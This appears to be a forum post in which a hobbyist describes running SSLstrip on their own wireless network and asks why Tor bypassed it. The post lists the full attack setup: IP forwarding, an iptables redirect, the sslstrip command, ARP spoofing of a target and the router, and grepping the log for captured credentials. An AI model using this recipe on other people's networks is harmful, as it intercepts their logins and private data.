Well I am quite happy to say that I gott SSLstrip working quite nicely on my network. It is amazing that I do not get a certificate warring when I go into my gmail and SSLstrip picks up all my confidential info. SSLstrip works fine over my wpa connection. Can surf around like SSLstrip not there and it picks up all my SSL info at facebook, gmail, mysite, etc.
Being the curious person that I am, I pushed the Tor button in my Firefox and surfed into my gmail. Using Tor this time I got a real https connection to gmail that was Tored. I thought about it for a moment but could not figure out why. I guess Tor bypassing SSLstrip is a good thing but I am sill wondering what’s going on. At Black Hat DC 2009 Feb 16-17 Marlinspike said it worked fine for him.
This is my setup.
# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT –to-port 8080
# python ./sslstrip.py -p -f -l 8080 (-p only SSL POST, -f favicon)
# arpspoof -i ath0 -t (targert IP) (router IP)
# cat sslstrip.log | grep (ie my email address etc)
BT4 doing the sniffing and a eeepc doing the surfing. Using 802.11g wpa
Anybody got any clues?
Best to you all